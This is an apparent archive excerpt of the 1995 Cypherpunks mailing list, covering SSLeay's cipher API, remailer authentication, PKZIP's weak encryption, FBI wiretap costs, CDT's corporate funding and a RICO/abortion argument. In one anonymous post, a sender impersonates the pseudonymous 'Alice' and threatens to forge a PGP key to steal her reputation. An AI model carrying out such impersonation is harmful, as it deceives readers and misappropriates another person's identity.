All code is plain ANSI C, with no machine or OS-specific functions or calls 
being used.
 
Peter.






From anonymous-remailer at shell.portal.com  Tue Nov 21 04:41:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 21 Nov 1995 20:41:06 +0800
Subject: "Junk E-Mail"
Message-ID: <199511211219.EAA10354@jobe.shell.portal.com>


On Tue, 21 Nov 1995, Rich Salz wrote:

> >RICO is very serious stuff.  Criminal prosecution under the terms of the
> 
> Like Operation Rescue?

My apologies, I'm sorry but I don't understand this reference.  What does
Operation Rescue have to do with the seriousness of RICO?  What is
Operation Rescue? 

I am definitely not an expert on foreign statute.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From ylo at cs.hut.fi  Tue Nov 21 04:46:35 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Tue, 21 Nov 1995 20:46:35 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511180319.UAA07399@usr5.primenet.com>
Message-ID: <199511210110.CAA00878@trance.olari.clinet.fi>


> PKZIP allows encryption (other's ?).  How about a hook to that?

PKZIP "encryption" is self-deception.  A program for cracking it,
PKCRACK, is widely available on the internet.  See e.g.
ftp.funet.fi:/pub/crypt/analysis.  

[For information about internationally available cryptographic
software, see http://www.cs.hut.fi/crypto.]

    Tatu Ylonen <ylo at cs.hut.fi>





From eay at mincom.oz.au  Tue Nov 21 04:49:37 1995
From: eay at mincom.oz.au (Eric Young)
Date: Tue, 21 Nov 1995 20:49:37 +0800
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
In-Reply-To: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>
Message-ID: <Pine.SOL.3.91.951121220824.2627A-100000@orb>


On Tue, 21 Nov 1995, Enzo Michelangeli wrote:
> This encryption library provides a universal interface to a number of 
> conventional-key encryption algorithms.  The library currently supports 
> encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
> triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
> CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 

:-) cute, the next version of SSLeay to be released will have the same 
thing, good to see great minds think alike (or is that simple minds 
seldom differ :-).

Currently the interface I will have is
EVP_EncryptInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *key,
	unsigned char *iv);
void EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl,
	unsigned char *in,int inl);
void EVP_EncryptFinal(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl);

with a string to bytes function,
int EVP_BytesToKey(EVP_CIPHER *type,EVP_MD *md,unsigned char *salt,
	unsigned char *data,int datal,int count,
	unsigned char *key,unsigned char *iv);

this is upward compatable with PKCS#5 and will generate a key and iv of 
the correct size depending on the EVP_CIPHER for a data string (the 
lengths are encoded in the EVP_CIPHER definition).
I also have all my Message digest routines using the same type of interface.

What makes this nice is that all my digital signature routines 
(open, seal, sign, verify etc) all take EVP_CIPHER and EVP_MD arguments 
so any cipher can be used and any MD can be used.  The ASN1 object 
identifiers are contained in the EVP_CIPHER/EVP_MD structures.

It also make the 'demo' program that supports all the above mentioned 
encryption modes (and also does base64 encoding/decoding) only 290 lines 
long :-).

Now, heres the rub, to use a cipher to encode in pkcs#7 (which is what
S/MIME is using) one needs to have an object identifier (for use in the
ASN1 encoding).  I know of very few object identifiers.

type			object identifier.
EVP_des_ecb		1 3 14 3 2 6
EVP_des_ede
EVP_des_ede3		1 2 840 113549 3 17 (or is this EVP_des_ede (2 keys))
EVP_des_cfb		1 3 14 3 2 9
EVP_des_ede_cfb
EVP_des_ede3_cfb
EVP_des_ofb		1 3 14 3 2 8
EVP_des_ede_ofb
EVP_des_ede3_ofb
EVP_des_cbc		1 3 14 3 2 7
EVP_des_ede_cbc
EVP_des_ede3_cbc
EVP_rc4			1 2 840 113549 3 4
EVP_idea_ecb
EVP_idea_cfb
EVP_idea_ofb
EVP_idea_cbc
MD_md2			1 2 840 113549 2 2
MD_md5			1 2 840 113549 2 5
MD_sha			1 3 14 3 2 18

Can anyone out there fill in the blanks?  I also supose the new version 
of SHA, SHA-1 will also have a different identifier as well which I will 
also need.

In the above, I always use 'ede' to refer to encrypt-decrypt-encrypt with 
2 keys and 'ede3' to refer to ede with three keys.

eric (on a quest for object identifiers... and to finish the next version
      of SSLeay before he goes on a long holiday...)





From loki at obscura.com  Tue Nov 21 21:37:43 1995
From: loki at obscura.com (Lance Cottrell)
Date: Tue, 21 Nov 95 21:37:43 PST
Subject: Syrinx Remailer is no more
Message-ID: <acd8650b03021004a42c@[137.110.24.250]>


-----BEGIN PGP SIGNED MESSAGE-----

This is the kind of announcement which really needs to be authenticated.
I will leave syrinx on my list until I see a signed message confirming this
announcement. If we do not bother to authenticate this kind of message, why
bother with all the crypto, here is the mother of all denial of service
attacks.


        -Lance

At 7:22 PM 11/21/95, Sam Kaplin wrote:
>Effective immediately syrinx at c2.org is no more. I no longer have the
>time to keep this remailer up and running. Perhaps somewhere down the
>line I will set up another one. Please remove Syrinx from your chains.
>
>Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLK1+vPzr81BVjMVAQHgoAf/TpVsZ+St9vz4ix5PLaabP60ybJRATE+V
t2iBxQmxRqhOcdVPZJU1An5pUdCOCgB3amLXNJXkMnoOasi/0ps3igOw0uFaFUf8
ZgCvM4MfNsdPfduCRfsb+5a1IvTkhmP6oapX9lUXDB5a4nHRQvtXkt96sg2hgaIj
sqwPpGFaFvLhkiqQ971CL3+EV4+0GkZ3iH2g5pQ2BD6iACVBReINgCuyi/LiNbvZ
yGBguPb38VTCDWbzancgQVrMEzTdwcQrmhfhHDO/5H5g6reWrEMioKGWScTZgxH1
fMs40LXxwu25cUziywYjgw9uhEEQu1K1GY7sVE3CoPPenRfcKAutsA==
=c2AJ
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------







From hallam at w3.org  Tue Nov 21 21:45:56 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 21 Nov 95 21:45:56 PST
Subject: Java & Netscape security [NOISE]
In-Reply-To: <yo9XeD2w165w@bwalk.dm.com>
Message-ID: <9511220545.AA01344@zorch.w3.org>



I'm not sure where the policy of whether posts from foo.com should be
considered policy of foo.com but they certainly are considered in that
manner.

Rather than have this discussion here how about people read up the threat in
Hal Abelson's course on Ethics of the Electronic frontier?

http://swissnet.ai.mit.edu/6095/on-line-discussion/topic-1/

One point to be made is that at Universities we all have university accounts 
because people realise that there is no connection between our views and 
institute policy. The freedom to hold unpopular views being part of what 
universities are all about. On the other hand there is no such assuption 
concerning posts from foo.com.

I suspect that even in the UK one could sack an employee for making stupid 
statements from an Internet account. Particularly if they might lead a person to 
doubt the sanity of the person concerned.

On Phil Stromer, I don't think the Internet posts were the only point at issue. 
He was very offensive however, it was not merely the views he posted but the 
manner in which he made them that caused offense. He also made a lot of 
assertions concerning other posters which might have led to legal action 
against Sun.

	Phill





From sinclai at ecf.toronto.edu  Tue Nov 21 05:51:32 1995
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Tue, 21 Nov 1995 21:51:32 +0800
Subject: Virus attacks on PGP
In-Reply-To: <199511210732.XAA04912@netcom18.netcom.com>
Message-ID: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>


> Certainly having PGP run from a CDROM or other read-only device would be a
> big help.  Even better would be to have all the privileged code also run
> from a read-only device.

Seeing as PGP is quite small the simplest and cheapest read-only device
would be a write-protected floppy disk.

Could a virus write to a write-protected disk?  I'm not sure if the
protection is done in the BIOS or the drive hardware.





From anonymous-remailer at shell.portal.com  Tue Nov 21 06:27:43 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 21 Nov 1995 22:27:43 +0800
Subject: toolkits?
Message-ID: <199511211405.GAA17363@jobe.shell.portal.com>


Alice here ...

On Wed, 8 Nov 1995, Daniel R. Oelke,
 <droelke at aud.alcatel.com> wrote:

> > Now were getting specific. These are things that us ordinary folk can do
> > which show the 'leaders' how to follow. What software, hardware,
> > applications, support and sysadmin experience is required and where is it
> > available on what terms. What are the cash flow opportunities to support
> > such services? 

By "cash flow-opportunities", is this the "opportunity-cost" of providing
services??  The foregone profits of today.  Or is this the future cash
flow opportunities which could arise from this type of activity.  The
future assets of tomorrow? 

Essentially, doesn't all of this reduce to "valuing" in present dollar
terms (i.e.  attaching a discounted present value through some appropriate
hurdle rate) to some level of future benefit. 

The real issue as I see it, is finding some way to actually "fund" that 
hazy discounted present value.

> A good service would be to provide and support distribution of 
> of privacy enhancing tools to universities and companies that
> want them.  i.e. have people who will help set up firewalls,
> PGP, encrypted telnet (pick your flavor), etc. 

As long as it of course *obviously* excludes product like Netscape
Navigator -- the black-box code with significant security holes and flaws --
I'd have to agree that this is in fact a very good idea.

But it requires forward-thinking.  It's no different actually than paying 
someone for what they know, rather than paying them for what they do.

> Yes - I know that most of this stuff is out there already,
> but having people *willing* to integrate it for you without
> charging an arm and a leg would go a long way towards convincing the
> suits that this is a *good* thing.  

It sounds good on the surface.  In fact the liason officer / integrator
might even establish some valuable "working relationships".  I think that
this form of thinking is what will define who will be long term players in
this industry -- and who won't.  

Those who are able to build "goodwill" will survive and flourish, while
the others will flounder. 

If I may paraphrase, I believe that Dan is speaking possibly of
loss-leader services.  Services which do not in actuality show presently
as "high value-added" under our antiquated systems of accounting and
measurement.  Services which might in fact reduce short-term "profits"
because they are "current-expensed" rather than being recognized as the
deferred assets, they in fact truly are. 

(Essentially, the same problem we've visited with R&D expenses.  The
problem where the "solution" is defined as cutting R&D expense, so that
there is increased "profit", although long-term health and corporate
competitiveness is actually weakened.  A true management accounting
paradox.)

There should be a re-focus onto a horizon that is somewhat longer than the
current quarter.  Or the current day, for that matter, or the current
moment.  Unfortunately, these types of "forward-thinking" plans and
projects all require current funds.  Money.  And lots of it, before they
start showing and generating "measurable" returns.  It really is the
laying and strengthening of foundations. 

And who has the authority to spend any money on "wasteful" foundations??

If no one funds these types of projects, either jointly or individually, 
then these projects and bright ideas invariably go absolutely nowhere.


> Dan
> ------------------------------------------------------------------
> Dan Oelke                                  Alcatel Network Systems
> droelke at aud.alcatel.com                             Richardson, TX



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From karn at unix.ka9q.ampr.org  Tue Nov 21 06:32:03 1995
From: karn at unix.ka9q.ampr.org (Phil Karn)
Date: Tue, 21 Nov 1995 22:32:03 +0800
Subject: Applied Cryptography case filings on the Web
Message-ID: <199511210500.VAA01678@unix.ka9q.ampr.org>


The government has filed its Motion to Dismiss, or In The Alternative,
For Summary Judgment in the case of Karn vs State Dept. This case
challenges the arbitrary Commodity Jurisdiction Request rulings
made for the book Applied Cryptography and for a floppy disk containing
the same source code printed in the book.

I've begun scanning in and HTMLizing the various government documents,
some of which are sizeable. As I finish them I'm putting them up on
my web page. Please feel free to pass around this URL:

http://www.qualcomm.com/people/pkarn/export/index.html

--Phil





From nelson at crynwr.com  Tue Nov 21 06:46:14 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 21 Nov 1995 22:46:14 +0800
Subject: toolkits?
In-Reply-To: <199511211405.GAA17363@jobe.shell.portal.com>
Message-ID: <m0tHtcC-000G1LC@ns.crynwr.com>


anonymous-remailer at shell.portal.com writes:
 > Alice here ...

How do we know this for a fact?

-russ <nelson at crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | Neither is a good choice:
Potsdam, NY 13676 |  Abortion is murder; forced childbirth is slavery.





From droelke at spirit.aud.alcatel.com  Tue Nov 21 07:21:03 1995
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 21 Nov 1995 23:21:03 +0800
Subject: Get your own ITAR
Message-ID: <9511211457.AA03654@spirit.aud.alcatel.com>



I just called this number and was given the following instructions:
Fax your request to (703)875-6647 Attn Donna Davis, include your name 
and address. Allow 10-15 days for US mail or include your Fed-Ex 
account number for faster service.

Enjoy,
Dan
> 
>     1 703 875 6644.
> The kindly administrative assistant there will take your name and address
> and send you a hardcopy of the ITAR regulations.  I don't know about
> overseas mailings.  I also imagine you will have to wait until the current
> US budget stale-mate is resolved.  (Thanks to digest-reader walt at osf.org
> for the phone number.)
> 	/r$
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                             Richardson, TX






From dreschs at mpd.tandem.com  Tue Nov 21 08:27:09 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Wed, 22 Nov 1995 00:27:09 +0800
Subject: "Junk E-Mail"
In-Reply-To: <199511210955.BAA16150@jobe.shell.portal.com>
Message-ID: <199511211546.JAA04806@galil.austnsc.tandem.com>


anonymous-remailer at shell.portal.com said:

a> On Mon, 20 Nov 1995 hallam at w3.org wrote:
>> I think it would be better to slap a RICO suit onto the company
>> concerned. It sound to me like an attempt to gain financial advantage
>> through threatening behaviour. Where I come from that means jail
>> time.

a> RICO is very serious stuff.  Criminal prosecution under the terms of
a> the Racketeer-Influenced & Corrupt Organizations Act is reserved for
a> very serious situations indeed.  It's true "rubber hose" stuff.

a> It was intended as a tool for use against mobsters, but US attorneys
a> have used it against white-collar criminals.  I think, you'd have to
a> have strong evidence of an ongoing "criminal enterprise", which I
a> don't think you have with junk e-mail.

	Actually, they've started using it against vicious
reversed-black-collar (and non-collared) criminals for daring to
exercise their right under the first amendment to peacably protest.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From dreschs at mpd.tandem.com  Tue Nov 21 08:27:48 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Wed, 22 Nov 1995 00:27:48 +0800
Subject: "Junk E-Mail"
In-Reply-To: <199511211219.EAA10354@jobe.shell.portal.com>
Message-ID: <199511211551.JAA04817@galil.austnsc.tandem.com>


anonymous-remailer at shell.portal.com said:

a> On Tue, 21 Nov 1995, Rich Salz wrote:
>> >RICO is very serious stuff.  Criminal prosecution under the terms of
>> the
>> 
>> Like Operation Rescue?

a> My apologies, I'm sorry but I don't understand this reference.  What
a> does Operation Rescue have to do with the seriousness of RICO?  What
a> is Operation Rescue?

a> I am definitely not an expert on foreign statute.

	They (as in, the government) has used the RICO laws against
Operation Rescue, an anti-abortion/pro-life (pick your term) group for
protesting/picketing abortion clinics and doctors who perform abortions.
If they had prosecuted under statutes which applied to everyone, I
wouldn't have had a problem, but they are going after OR and similar
organizations for using tactics similar to those used by civil rights
protesters in the 60s.  'Course, civil rights is Politically Correct.
Abortion rights is Politically Correct.  Protesting abortion is
Politically Incorrect, therefore illegal.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From pcw at access.digex.net  Tue Nov 21 08:34:58 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Wed, 22 Nov 1995 00:34:58 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130512acd7941208f9@[199.125.128.5]>



Has anyone ever done the math on the FBI's new wire tapping
proposals and determined whether they'll have enough agents to
do all of the listening? Doesn't a court ordered wire tap
require that people listen in and screen the recordings. Does
this have to be in real time? I can't remember, but I think
there is a fairly onerous evidentiary chain required to use this
technology.

For instance, if 1% of America is on the phone during the peak
hours of the day, then that puts 2.5 million Americans on the
phone or 1.25 million conversations. If the FBI wants access to
1% of that, that is still 12,500 simulataneous conversations.
That would seem to imply 12,500 people to listen to the tapes,
right? Would that take agents off the streets?

12,500 agents would cost $1.2 billion a year if they each cost
about $100,000 in salary and benefits. But we need to account
for vacations, shift work and testifying the trials of the drug
lords who are sent to jail. Let's assume that you only need
1/10th the people to handle the two evening shifts. That gives
you a cost of $1.4 billion before vacations. Adding 40% to cover
vacation and weekends puts you close to $2 billion. Let's round
up.

So it would cost $2 billion just to use the information here.
This leads me to believe that they're thinking of building
automatic voice recognition equiptment in the future. What does
anyone think of the numbers?

-Peter Wayner







From anonymous-remailer at shell.portal.com  Tue Nov 21 08:35:33 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 22 Nov 1995 00:35:33 +0800
Subject: toolkits?
Message-ID: <199511211555.HAA27530@jobe.shell.portal.com>


[note cunning copy of Alice type quoting style, and cunning use of
the same remailer as the last in the chain]

On Tue, 21 Nov 1995, Russell Nelson wrote:

> anonymous-remailer at shell.portal.com writes:
> > Alice here ...
> 
> How do we know this for a fact?

We don't.

As an incentive for Alice to generate herself a PGP key, I hereby
place Alice on notice that if she doesn't sign her next post, and
provide a PGP key, I will create one for her, and steal all the
postive (?) reputation that she has developed so far.

You have 24 hours Alice, otherwise a key gets posted to here, and to
the keyservers with your nym on it.

[someone masquerading as]

Alice de 'nonymous ...

[who will soon steal her nym (as an experiment in Nym
misappropriation, and reputation theft from those who don't use
authentication).  Evolution in action :-)]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From rah at shipwright.com  Tue Nov 21 09:27:22 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:27:22 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02120d02acd7b0dbea42@[199.0.65.105]>


>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening?

Hettinga's Corollary to Gilmore's Law ("Censorship is Damage")

In a geodesic network, one node can't route all the traffic. It will choke.

Cheers,
Bob

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From rah at shipwright.com  Tue Nov 21 09:29:48 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:29:48 +0800
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Message-ID: <v02120d03acd7b25b44b5@[199.0.65.105]>



--- begin forwarded text

From: Fisher Mark <FisherM at is3.indy.tce.com>
To: www-buyinfo <www-buyinfo at allegra.att.com>
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Date: Tue, 21 Nov 95 09:21:00 PST
Encoding: 61 TEXT


>From the net-happenings list...
=========================
From: Gleason Sackman <sackman at plains.nodak.edu>
Date: Mon, 20 Nov 1995 10:36:42 -0600 (CST)
Subject: WWW> CALL FOR PAPERS: Electronic Commerce and the Internet

From: raustin at netcom.com (Rick Austin)
Date: Fri, 10 Nov 1995 03:11:56 GMT

     Call for Papers:


     Interested authors are encouraged to submit manuscripts for feature
     articles on Electronic Commerce and the Internet. Six papers are sought

     for a special feature for the June 1996 issue of the Communications of
     the ACM (CACM). Co-Guest Editors for the feature are Rick Austin and
     Ray Pyle of the Bell Atlantic Internet Services Center.

     Guidelines:
     Articles should be written for a general audience consisting of a
     range of experience and backgrounds, but aimed at the general
     practitioner.

     7000 to 10,000 words
     3 to 5 graphic inserts (optional)


     Topics:

     Internet Security
     Electronic Commerce Security
     Digital Signature
     Digital Cash
     Firewalls and gateways
     MIME and attachments
     Integrated EDI/Internet
     Effectiveness of the Internet for commerce
     Advances in Electronic Commerce
     Etc.

     Schedule:

     Finished manuscripts and Author Bio due December 1, 1995.

     Editors comments back by December 15, 1995

     Photo Ready copy due Jan 10 1996.


     Mail or Email to

     Raymond Pyle
     13100 Columbia Pk E47
     Silver Spring, Md. 20904

     raymond.h.pyle at bell-atl.com
======================================================================
Mark Leighton Fisher                   Thomson Consumer Electronics
fisherm at indy.tce.com                   Indianapolis, IN

--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From ericande at cnw.com  Tue Nov 21 09:36:38 1995
From: ericande at cnw.com (Eric Anderson)
Date: Wed, 22 Nov 1995 01:36:38 +0800
Subject: Using anon.remailers
Message-ID: <01BAB7EF.4FB8FC60@king1-02.cnw.com>


	Would someone point me to where I can read about how to use
the cypherpunk and mixmaster type of anon.remailers?
	Thanks, 
	Eric






From JWRCLUM at aol.com  Tue Nov 21 09:38:32 1995
From: JWRCLUM at aol.com (JWRCLUM at aol.com)
Date: Wed, 22 Nov 1995 01:38:32 +0800
Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
Message-ID: <951121120109_29631303@emout04.mail.aol.com>



---------------------
Forwarded message:
From:	gcook at tigger.jvnc.net (Gordon Cook)
Sender:	med-privacy at essential.org
Reply-to:	gcook at tigger.jvnc.net
To:	med-privacy at essential.org (Multiple recipients of list)
Date: 95-11-20 22:44:48 EST


     The following article appeared in the current issue of
Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995,
page one).  It is redisseminated on the Internet with the 
permission of CCR.

SELF-PROCLAIMED "PUBLIC INTEREST" GROUP  HEAVILY FUNDED BY
COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD
BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS --
EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX                                 

     The Center for Democracy & Technology (CDT), a self-
proclaimed "public interest organization," is in fact heavily
funded by large private computer, telecommunications, and
databank corporations.
     Funders of CDT, a two-year old Washington, D.C.-based
advocacy organization, include Dunn & Bradstreet Corp., Equifax
Inc., and TRW Information Services, three large databank
corporations that stand to benefit from federal legislation CDT
actively helped shaped and is shepherding through Congress.
     This year, CDT has received $699,643 from more than 30 large
corporations, including $100,000 from Microsoft, $75,000 from
AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer,
$25,000 from IBM, $10,000 from TRW Information Services, $10,000
from Dunn & Bradstreet, $5,000 from Direct Marketing Association,
and $5,000 from Equifax Inc. (For a complete list of CDT's
funders, see At A Glance, page 16)
     At a hearing before the Senate Labor and Human Resources
Committee last week, CDT deputy director Janlori Goldman said
that CDT "strongly supports" legislation, S. 1360, sponsored by
Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont),
because it represents "the most comprehensive and strong privacy
bill the Congress has yet considered in this area."
     But opponents of the bill argue that the legislation is not
a privacy statute at all, but instead is a vehicle that would
legitimize the creation of large computerized databanks of
personal medical information, thus benefitting those companies
like TRW and Equifax that give financial support to CDT. The
legislation would allow for broad, unauthorized searches of those
databanks, opponents claim.
     In an interview, Goldman told Corporate Crime Reporter that
all of CDT's corporate funding is earmarked for other projects
and that none of the corporate funding is supporting her work on
the medical privacy bill.
     "The corporate funding is not related at all, in any way
shape or form to my work on this bill," Goldman said. "The reason
we are doing this bill is that I've worked on privacy issues for
a decade. The most important privacy issue to work on is the
passage of the medical records privacy legislation. That is a
very sincere issue for me."
     "None of the corporate support that CDT gets is related to
my work on this bill," Goldman emphasized. "None. Zippo."
     CDT's executive director, Jerry Berman agreed. "We have no
funding for the medical privacy project -- zero," Berman said.
     But critics of the CDT's position on the legislation were
skeptical.
     "During the Senate hearing this week, Senator Bennett was
angered at the suggestion that S. 1360 was an industry bill,"
said Jamie Love of Ralph Nader's Center for Study of Responsive
Law. "He claimed that he had widely consulted with privacy groups
and patient advocates. CDT's Janlori Goldman was the key person
who decided who was in the loop, and who was not in the loop on
this issue. Groups that were not receptive to the idea of massive
database systems of personal medical records were excluded from
deliberations."
     "To find out that CDT has been funded by companies such as
Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies
is remarkable, because these are among the groups who have the
most at stake in legitimizing and preserving the current system
of maintaining and managing medical records," Love said. "I think
that Janlori Goldman should have mentioned in her Senate
testimony that CDT was funded by corporations who have an
interest in this issue."
     "If CDT were doing its job, TRW and Equifax wouldn't want to
give it money," Love added.
     Harold Eist, president-elect of the American Psychiatric
Association, said that "any datagathering and large computer
company would clearly benefit from legislation that drives large
amounts of individually identified data about American citizens
into data banks without the knowledge and permission of those
American citizens." 
     "Selling that information would represent a gold mine for
those companies," Eist said.
     "It is not surprising that an organization with a
disingenuous name -- Center for Democracy & Technology -- would
be supporting a bill with a disingenuous name -- The Medical
Records Confidentiality Act," Eist said. "In fact, this bill
represents an effort to give away the privacy of American
citizens without their knowledge."
     "My understanding is that Janlori Goldman was involved in
writing the bill," Eist said. "It seems to me that as a former
civil libertarian, she should know very well that there are
loopholes in that bill regarding protections to privacy that you
could drive a Mack truck through." 
     "Unless people can be assured that their privacy will be
protected, there is little or no chance that they will reveal the
kind of tormented and dark secrets that they have to reveal to
recover from their illnesses," Eist said. "Confidentially is the
sine qua non of medical treatment, and especially if it is
psychiatric medical treatment."
     A driving force behind the effort to derail the
Bennett/Leahy bill is Denise Nagel, a Boston physician who
organized the Coalition for Patient Rights of New England "to
restore confidentiality to the doctor-patient relationship."
     Nagel refused to comment on CDT's funding.
     At the Senate hearing last week, Nagel told the committee "I
have no industry ties."
     Nagel charged that S. 1360 was written "to advance the
interests of certain segments of the computer,
telecommunications, data processing and health-care industries."
     "With this bill they would be able to careen full speed
ahead to develop data networks that will give innumerable people
access to our medical records legally and without our knowledge,"
Nagel said.
     "I am convinced that S. 1360 is not at all primarily
concerned with the confidentiality of medical records," Nagel
told the committee. "It is just the opposite. It talks about
informed consent, but then authorizes the creation of databases
without patient knowledge or consent. It talks about individual
rights, and then allows police broad authority to search
databases directly instead of obtaining a specific record from
the patient's doctor. It talks about civil and criminal
sanctions, and then pre-empts all common law and most existing
and future state statutes. It talks about ensuring personal
privacy with respect to medical records, and then sets a ceiling
rather than a floor on medical confidentiality."

AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-
1995

American Advertising Federation         500.00
America Online, Inc.                 25,000.00
Apple Computer Inc.                  50,000.00
AT&T                                 75,000.00
Bell Atlantic                        60,000.00
Business Software Alliance            6,000.00
Cellular Tellecomm Indust Assn       10,000.00
CompuServ                            30,000.00
Delphi Internet Services Corp        10,000.00
Direct Marketing Association          5,000.00
Dunn & Bradstreet Corp               10,000.00
EMA                                   5,000.00
Equifax Inc.                          5,000.00
John Gilmore                          2,500.00
Hartford Foundation                 153,000.00    
IBM                                  25,000.00
Information Technology Industry       5,000.00
Interactive Digital Software          5,000.00
Lotus                                 6,250.00
MARC                                 80,000.00
MCI Telecommunications               15,000.00
Microsoft                           100,000.00
National Cable Television Assn       15,000.00
Netscape Communications Corp          5,000.00
Newspaper Association of Am           5,000.00
Nynex Government Affairs             25,000.00
Pacific Telesis                      25,000.00
Prodigy Service Company              10,000.00
Software Publishers Assn             10,000.00
Time Warner Inc                       5,000.00
TRW Information Svcs                 10,000.00
US Telephone Association             10,000.00
US West Inc                          10,000.00

Total Funding                        814,020.00

Received 1994                        114,377.00
Received 1995                        699,643.00

Total Funding                        814,020.00


Russell Mokhiber
russell at essential.org
voice: 202/429-6928








From nobody at REPLAY.COM  Tue Nov 21 09:53:58 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 22 Nov 1995 01:53:58 +0800
Subject: "Junk E-Mail"
Message-ID: <199511211647.RAA15185@utopia.hacktic.nl>


Sten wrote:

>        They (as in, the government) has used the RICO laws against
>Operation Rescue, an anti-abortion/pro-life (pick your term) group for
>protesting/picketing abortion clinics and doctors who perform abortions.

      And for successfully encouraging the murder of doctors. 

>If they had prosecuted under statutes which applied to everyone, I
>wouldn't have had a problem, but they are going after OR and similar
>organizations for using tactics similar to those used by civil rights
>protesters in the 60s.

      Who were systematically arrested, beaten, teargassed, wiretapped,
and even occasionally shot at. I *know*--I got firehosed, beaten,
arrested, and wiretapped for what I did. That's why I'm a Cypherpunk now.
      OR has received far better treatment than the civil rights
protesters ever did--or did I miss the news items reporting that Terry
Randall and Ralph Reed had been assassinated, and that their lieutenants
had been bumped off in black-bag jobs, and that their colleagues were
chained down to chairs *in court*?

>                       'Course, civil rights is Politically Correct.
>Abortion rights is Politically Correct.  Protesting abortion is
>Politically Incorrect, therefore illegal.

      Do you usually send nursery rhymes to mailing lists?





From lull at acm.org  Tue Nov 21 10:17:43 1995
From: lull at acm.org (John Lull)
Date: Wed, 22 Nov 1995 02:17:43 +0800
Subject: Virus attacks on PGP
In-Reply-To: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>
Message-ID: <199511211743.JAA06639@ix8.ix.netcom.com>


On Tue, 21 Nov 1995 08:34:46 -0500, you wrote:

> Seeing as PGP is quite small the simplest and cheapest read-only device
> would be a write-protected floppy disk.
> 
> Could a virus write to a write-protected disk?  I'm not sure if the
> protection is done in the BIOS or the drive hardware.

In the drive hardware.






From s1113645 at tesla.cc.uottawa.ca  Tue Nov 21 10:51:44 1995
